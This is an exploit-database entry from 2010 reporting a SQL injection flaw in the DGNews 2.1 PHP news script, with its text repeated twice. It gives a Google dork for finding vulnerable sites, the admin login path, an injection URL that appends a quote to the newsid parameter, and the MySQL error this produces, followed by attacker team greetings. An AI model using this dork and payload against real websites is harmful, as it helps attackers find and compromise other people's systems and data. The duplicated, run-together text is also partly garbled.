DGNews 2.1 SQL Injection Vulnerability

2010-12-30T00:00:00
ID 1337DAY-ID-15262
Type zdt
Reporter kalashnikov
Modified 2010-12-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #Remote SQL Injection Vulnerability
#name      : DGNews v 2.1
#Author    : kalashnikov
#dork      : inurl:news.php?go=fullnews&newsid
#admincp   : admin/login.php
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1'
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227===========================
# Site      : http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {26-12-2010}
# Software  : DGNews v 2.1
# Greetz    : just me :L
# team      : VoLc4n0 --=-- stone love --=-- fla$h
 
#Remote SQL Injection Vulnerability
#name      : DGNews v 2.1#
Author    : kalashnikov
#dork      : inurl:news.php?go=fullnews&newsid
#admincp   : admin/login.php
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1'
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227
===========================
# Site      : http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {26-12-2010}# Software  : DGNews v 2.1# Greetz    : just me :L
# team      : VoLc4n0 --=-- stone love --=-- fla$h



#  0day.today [2018-02-06]  #